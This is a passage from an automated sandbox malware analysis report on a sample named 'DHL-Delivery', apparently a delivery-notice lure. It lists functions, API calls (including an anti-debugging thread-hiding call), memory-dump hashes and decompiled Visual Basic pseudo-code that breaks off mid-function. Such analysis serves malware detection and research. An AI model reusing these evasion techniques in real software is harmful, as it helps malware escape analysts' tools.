                        • Opcode Fuzzy Hash: 5b0d1bd9457a7f04bb33e280e8eb45688ec578a46fba887126277872ffa809f3
                        • Instruction Fuzzy Hash: 48D0126944530935DD3204E45A7E3D924451F47371FA05344DE7A1B1D177A140439611
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Function 021A53AB, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction ID: 93e6778bd1086947eb0550ab65a39e5cd443b06c603c05014d44e4bbee778f52
                        • Opcode Fuzzy Hash: 2e31f6c2cdc4e60279075db27f9e386934e4ce49f1fb1a49214215288b0e1d76
                        • Instruction Fuzzy Hash: 1EC0C0208407439CEB103A748C0CBCF7C004F423B0F24031CDFF0300C187000161C020
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Non-executed Functions

                        Function 021A9B1E, Relevance: 4.0, Strings: 3, Instructions: 253nativethreadUNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                        • String ID: "Bp0$"Bp0$nTAz
                        • API String ID: 449006233-2565102045
                        • Opcode ID: 809f16dea9361a184fb69c4f8858878392459a591d6370bb8fd1c0fad57b14a4
                        • Instruction ID: 1528436d4a41a882ecefbd52f98786804fa1e44dc64a17b5d6003bd1fcea93b1
                        • Opcode Fuzzy Hash: 809f16dea9361a184fb69c4f8858878392459a591d6370bb8fd1c0fad57b14a4
                        • Instruction Fuzzy Hash: 69816E68A88342CEDB259E74C9B47E677D29F17360F99825ECCA28B1D6D325C4C1C713
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A9B65, Relevance: 4.0, Strings: 3, Instructions: 239librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                        • String ID: "Bp0$"Bp0$nTAz
                        • API String ID: 449006233-2565102045
                        • Opcode ID: 61454448312e6fd298f9aa4df9feda2cb5e32cfcce794b60897fc9de3037d2fd
                        • Instruction ID: cb30de69f454c3c4869b23201a6c11a63af8df9872b727738070b516340e6e3b
                        • Opcode Fuzzy Hash: 61454448312e6fd298f9aa4df9feda2cb5e32cfcce794b60897fc9de3037d2fd
                        • Instruction Fuzzy Hash: AF715E68A88342CEDB258E78C9B47E577D29F17360F99825ECCA78B1D6D32584C1C713
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A28FF, Relevance: .4, Instructions: 418nativethreadCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: b5b2fce8b9e60c7eab926fa5e329496b53580719259cbb867abf024ddd95f5d9
                        • Instruction ID: 9865c151170761ce254cd6e792e97ef41e8fb2a11a426ea6d83538c49891f456
                        • Opcode Fuzzy Hash: b5b2fce8b9e60c7eab926fa5e329496b53580719259cbb867abf024ddd95f5d9
                        • Instruction Fuzzy Hash: F9D16B75B80707EFEB288E24CDB07D673A2BF16350FA54229DC9683181D77998CAC791
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Function 021A2942, Relevance: .4, Instructions: 409librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: f4eca58764afdb000513ec107dfe66d088e5611ddf5da5278f1461dfe0816730
                        • Instruction ID: bf29cd56bf0524fd21d9c5a94786ca25fa15e36d32022f75296c03ac525f09ce
                        • Opcode Fuzzy Hash: f4eca58764afdb000513ec107dfe66d088e5611ddf5da5278f1461dfe0816730
                        • Instruction Fuzzy Hash: 18C16A75B80707EFE7288E24CDB07D673A2BF16350F954229DC9683281D779988AC791
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A2980, Relevance: .4, Instructions: 402librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 0288951470790c2100da33467460f1818775381c72f4e7d5ca0b353cfda91658
                        • Instruction ID: effa14bc965d15667066609b4f4f3c0ac11f2f52b977167f529f577f4d267128
                        • Opcode Fuzzy Hash: 0288951470790c2100da33467460f1818775381c72f4e7d5ca0b353cfda91658
                        • Instruction Fuzzy Hash: E2C16A75B80707EFE7184E24CDF07D6B3A2BF16350F954229DC5683280D779988AC791
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A29C5, Relevance: .4, Instructions: 387librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: bdcd2063673b49f21dc6d496d8bbbe88052e35f24d6028b7b8d016bf68855264
                        • Instruction ID: 832ffa065aa3710205902dc017cbf143e4bbc57064effa960df954dbe1683f0e
                        • Opcode Fuzzy Hash: bdcd2063673b49f21dc6d496d8bbbe88052e35f24d6028b7b8d016bf68855264
                        • Instruction Fuzzy Hash: C4C16975780707EFE7288E24CDB07D6B3A6BF12350FA54229DC6683180D77998CACB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A2A1B, Relevance: .4, Instructions: 363librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: 7c80ecb4d2c0aecc0ac5a43660e42cf83a9d34403bdad563b148e3c3ab440805
                        • Instruction ID: 30cea429f6afd111f6b884ee7388705ff0e2ec0739e1d427119f7dc2a1d5ea9d
                        • Opcode Fuzzy Hash: 7c80ecb4d2c0aecc0ac5a43660e42cf83a9d34403bdad563b148e3c3ab440805
                        • Instruction Fuzzy Hash: 5AB17975B80707EFE7188E24CDB07D2B3A2BF02350F954229DCA683280D73598CACB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A2A51, Relevance: .4, Instructions: 353librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: d683e7ef5c067e016e70c30a197af550101ddec92dd5bc20bc1489618b76122d
                        • Instruction ID: 3eba5f871e3e4942b86691cd2758fa5ecfb1a019986bd258e03520d09fd5da60
                        • Opcode Fuzzy Hash: d683e7ef5c067e016e70c30a197af550101ddec92dd5bc20bc1489618b76122d
                        • Instruction Fuzzy Hash: 94B15A75B80707EFE7188E24CDB07D6B3A2BF16350F954229DC6683280D7359889CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A3229, Relevance: .2, Instructions: 186COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c141efd4540883c98e83e0ee5d0ea7a42b6a0a767c6e13b2885d9b858444a2ae
                        • Instruction ID: d659189db78e2a8b55e9b7bc3bab0924b4fd6aad92b0bd41114fda446e6a4eb0
                        • Opcode Fuzzy Hash: c141efd4540883c98e83e0ee5d0ea7a42b6a0a767c6e13b2885d9b858444a2ae
                        • Instruction Fuzzy Hash: 99519868BC4313DED71899288CB17E623E67F423A0F964269ECB6C7181DB16C886C740
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A321F, Relevance: .2, Instructions: 178COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bcfc0c6c5084ae65cf4c5c102511a94e845dc48fad67d5462fb12658d51b330
                        • Instruction ID: 389f8c77b7dc419d6c657e9ddb1043fa90a2cad31641c1c5cd616147300c4df6
                        • Opcode Fuzzy Hash: 1bcfc0c6c5084ae65cf4c5c102511a94e845dc48fad67d5462fb12658d51b330
                        • Instruction Fuzzy Hash: 5A519928BC4313EED71859288DB17E623E67F423E0F964269DCB7C3181DB16C885C740
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A3614, Relevance: .2, Instructions: 173libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: ffdd864c4e570aa923b789da7514dbc724f3eb4efa281b2e43233ff05cb67030
                        • Instruction ID: a4bb26065a6aa8e708cf22d8854606b87591f5b48c09f1bb3333c192e98846d8
                        • Opcode Fuzzy Hash: ffdd864c4e570aa923b789da7514dbc724f3eb4efa281b2e43233ff05cb67030
                        • Instruction Fuzzy Hash: 1A41917C6C43029DEF225D588E797E273536F02760F928169DD926B1C2D3A5C083C916
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A3666, Relevance: .2, Instructions: 158COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7227a97935511e9b4fc34c18d58f8c96d51b188e1a56e243f8f0649843e4a7f3
                        • Instruction ID: 2b07cd40fb699a8461e1ffbe86dd0dcb8e496d0b6824009e4bc02377ca4d471f
                        • Opcode Fuzzy Hash: 7227a97935511e9b4fc34c18d58f8c96d51b188e1a56e243f8f0649843e4a7f3
                        • Instruction Fuzzy Hash: E741707C6C43029DFB226DA84E7E7E272935F02760FD181A5ED515B1D2D3A5C083C557
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A36AD, Relevance: .1, Instructions: 140libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 76ba4239b3ce0eab1ca11f70f47778453babada29bc4079e0318fb158de2b8a2
                        • Instruction ID: f6bb2fd751b9cdf02567ad191387b145a5f92c5285ead0c13dd7f193ff84d66b
                        • Opcode Fuzzy Hash: 76ba4239b3ce0eab1ca11f70f47778453babada29bc4079e0318fb158de2b8a2
                        • Instruction Fuzzy Hash: 3241717C7C4302ADEB226DA88E7E7E272536F02B60FE181A5ED515B1D2D3A5C083C516
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A36F0, Relevance: .1, Instructions: 126libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 2813fcff062c92f92dbde326759cc2fcea1b2b3080b83ff7081024757077e5ea
                        • Instruction ID: e900088d5f30725fa9b916258e6f2e4fc1fccec22e79fa87b52fd3073d5305b2
                        • Opcode Fuzzy Hash: 2813fcff062c92f92dbde326759cc2fcea1b2b3080b83ff7081024757077e5ea
                        • Instruction Fuzzy Hash: 89313C7C6C4302ADFB326E548E7EBE672526F42760FE28165DE951B0D2D3A5C083C916
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 021A8B4E, Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4be4a32e70ed644ed7332f67df69c2460fd782c2721bdde1d476fd66cbcdc6c
                        • Instruction ID: a8f8c482680207a195301ddd1441134b0e877a4fa13152296eeb36ec4ab37126
                        • Opcode Fuzzy Hash: e4be4a32e70ed644ed7332f67df69c2460fd782c2721bdde1d476fd66cbcdc6c
                        • Instruction Fuzzy Hash: B91126BC6D7145CFD722AA28C4F07E477E3AF56A24BCA41C1D0A28B1C6C321D843CB1A
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A4CB8, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7cdd37873ba9ee841654355f0eff25066b1a47703dbbb0feea6422e0297539a
                        • Instruction ID: 839be16d7486482e79e3aecbd2416f08f04d99562d74ea25ae7c941aa9a615c5
                        • Opcode Fuzzy Hash: b7cdd37873ba9ee841654355f0eff25066b1a47703dbbb0feea6422e0297539a
                        • Instruction Fuzzy Hash: 21C012B6B802848FF300CA14DAA1B8033B0AB22AC0B094080D8128B204E318E802CA00
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 021A8334, Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c278200e36d2f5dda35c5775fe644e8cdb34da82566b82e463f717aebf1badc
                        • Instruction ID: 6592a951d5bef39af41ba2a27329262d4f09fa220cc0a3ba63261dbab976564d
                        • Opcode Fuzzy Hash: 5c278200e36d2f5dda35c5775fe644e8cdb34da82566b82e463f717aebf1badc
                        • Instruction Fuzzy Hash: 44C04830290584CFC289CE48C2B8B9673AABF29A80FC204D0E8928FA51D324EC918B00
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 0041078E, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 108UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 49%
                        			E0041078E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				void* _v92;
				signed int _v96;
				intOrPtr* _v104;
				signed int _v108;
				signed int _t39;
				signed int _t45;
				char* _t49;
				intOrPtr _t73;

				_push(0x4011d6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_push(0x58);
				L004011D0();
				_v12 = _t73;
				_v8 = 0x401160;
				L004012DE();
				_v64 = 0x4b;
				_v72 = 2;
				_t39 =  &_v72;
				_push(_t39);
				L00401278();
				L00401320();
				_push(_t39);
				_push(0x40e784);
				_push(0x40e78c);
				L0040131A();
				L00401320();
				_push(_t39);
				L00401308();
				asm("sbb eax, eax");
				_v92 =  ~( ~_t39 + 1);
				_push( &_v52);
				_push( &_v48);
				_push(2);
				L0040129C();
				L004012D8();
				_t45 = _v92;
				if(_t45 != 0) {
					if( *0x412010 != 0) {
						_v104 = 0x412010;
					} else {
						_push(0x412010);
						_push(0x40e9a0);
						L004012C6();
						_v104 = 0x412010;
					}
					_t49 =  &_v56;
					L004012CC();
					_v92 = _t49;
					_v80 = 0x80020004;
					_v88 = 0xa;
					L004011D0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t45 =  *((intOrPtr*)( *_v92 + 0x1b0))(_v92, 0x10, _t49,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x300))( *_v104));
					asm("fclex");
					_v96 = _t45;
					if(_v96 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1b0);
						_push(0x40e6c4);
						_push(_v92);
						_push(_v96);
						L004012C0();
						_v108 = _t45;
					}
					L004012A8();
				}
				asm("wait");
				_push(0x410912);
				L004012D8();
				return _t45;
			}





















                        0x00410793
                        0x0041079e
                        0x0041079f
                        0x004107a6
                        0x004107a9
                        0x004107b1
                        0x004107b4
                        0x004107c1
                        0x004107c6
                        0x004107cd
                        0x004107d4
                        0x004107d7
                        0x004107d8
                        0x004107e2
                        0x004107e7
                        0x004107e8
                        0x004107ed
                        0x004107f2
                        0x004107fc
                        0x00410801
                        0x00410802
                        0x00410809
                        0x0041080e
                        0x00410815
                        0x00410819
                        0x0041081a
                        0x0041081c
                        0x00410827
                        0x0041082c
                        0x00410832
                        0x0041083f
                        0x00410859
                        0x00410841
                        0x00410841
                        0x00410846
                        0x0041084b
                        0x00410850
                        0x00410850
                        0x00410874
                        0x00410878
                        0x0041087d
                        0x00410880
                        0x00410887
                        0x00410891
                        0x0041089b
                        0x0041089c
                        0x0041089d
                        0x0041089e
                        0x004108a7
                        0x004108ad
                        0x004108af
                        0x004108b6
                        0x004108d2
                        0x004108b8
                        0x004108b8
                        0x004108bd
                        0x004108c2
                        0x004108c5
                        0x004108c8
                        0x004108cd
                        0x004108cd
                        0x004108d9
                        0x004108d9
                        0x004108de
                        0x004108df
                        0x0041090c
                        0x00410911

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 004107A9
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 004107C1
                        • #572.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 004107D8
                        • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 004107E2
                        • __vbaStrCat.MSVBVM60(0040E78C,0040E784,00000000,00000002), ref: 004107F2
                        • __vbaStrMove.MSVBVM60(0040E78C,0040E784,00000000,00000002), ref: 004107FC
                        • __vbaStrCmp.MSVBVM60(00000000,0040E78C,0040E784,00000000,00000002), ref: 00410802
                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,0040E78C,0040E784,00000000,00000002), ref: 0041081C
                        • __vbaFreeVar.MSVBVM60 ref: 00410827
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041084B
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410878
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00410891
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,000001B0), ref: 004108C8
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E6C4,000001B0), ref: 004108D9
                        • __vbaFreeVar.MSVBVM60(00410912), ref: 0041090C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$ChkstkMove$#572CheckHresultListNew2
                        • String ID: K
                        • API String ID: 72651421-856455061
                        • Opcode ID: b3a86521a1edaa85f39e09b13f6bf3475082cca89d0e913bfb83d62787983aa4
                        • Instruction ID: 7f89cbc46d3b3b53bff1dad259a1557e6c18c1b75b9ba84245b251bf0ed0a8fa
                        • Opcode Fuzzy Hash: b3a86521a1edaa85f39e09b13f6bf3475082cca89d0e913bfb83d62787983aa4
                        • Instruction Fuzzy Hash: 50415B71910248ABDB00EFE2C946BDEB7B8AF08704F20452EF501FB2E1DBB85945CB59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 00410F15, Relevance: 22.7, APIs: 15, Instructions: 154UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E00410F15(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4, void* _a12, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				intOrPtr _v100;
				short _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v132;
				signed int _v136;
				intOrPtr* _v140;
				short _v144;
				char _v148;
				signed int _v152;
				char* _t71;
				signed int _t75;
				char* _t79;
				signed int _t86;
				char* _t88;
				intOrPtr _t97;
				void* _t110;
				void* _t112;
				intOrPtr _t113;
				char _t119;

				_t119 = __fp0;
				_t113 = _t112 - 0xc;
				 *[fs:0x0] = _t113;
				L004011D0();
				_v16 = _t113;
				_v12 = 0x4011b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011d6, _t110);
				L004012A2();
				L004012DE();
				if( *0x412010 != 0) {
					_v132 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v132 = 0x412010;
				}
				_t71 =  &_v48;
				L004012CC();
				_v108 = _t71;
				_t75 =  *((intOrPtr*)( *_v108 + 0xd8))(_v108,  &_v104, _t71,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x310))( *_v132));
				asm("fclex");
				_v112 = _t75;
				if(_v112 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0xd8);
					_push(0x40e6f8);
					_push(_v108);
					_push(_v112);
					L004012C0();
					_v136 = _t75;
				}
				if( *0x412010 != 0) {
					_v140 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40e9a0);
					L004012C6();
					_v140 = 0x412010;
				}
				_t97 =  *((intOrPtr*)( *_v140));
				_t79 =  &_v52;
				L004012CC();
				_v116 = _t79;
				_v92 = 0x80020004;
				_v100 = 0xa;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v104;
				asm("fild dword [ebp-0x8c]");
				_v148 = _t119;
				_v76 = _v148;
				_t86 =  *((intOrPtr*)( *_v116 + 0x224))(_v116, _t97, 0x10, 0x10, 0x10, _t79,  *((intOrPtr*)(_t97 + 0x304))( *_v140));
				asm("fclex");
				_v120 = _t86;
				if(_v120 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x224);
					_push(0x40e6b4);
					_push(_v116);
					_push(_v120);
					L004012C0();
					_v152 = _t86;
				}
				_push( &_v52);
				_t88 =  &_v48;
				_push(_t88);
				_push(2);
